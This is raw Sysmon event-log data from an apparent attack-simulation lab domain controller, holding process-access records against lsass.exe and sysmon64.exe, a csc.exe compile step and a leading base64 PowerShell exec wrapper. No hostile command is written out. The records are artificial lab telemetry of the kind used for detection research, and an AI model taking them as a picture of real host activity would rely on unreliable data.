JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.571{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.571{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.571{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:13.540{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\mrbnyq5x.dll2020-11-03 15:52:13.446 10341000x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAD-5FA1-B100-000000008801}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAD-5FA1-B100-000000008801}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.540{D28789B6-7CAD-5FA1-B000-000000008801}44841744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CAD-5FA1-B100-000000008801}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.544{D28789B6-7CAD-5FA1-B100-000000008801}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES397A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF520C731E139479BB2BE57D7EBA302A.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\mrbnyq5x.cmdline" 10341000x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 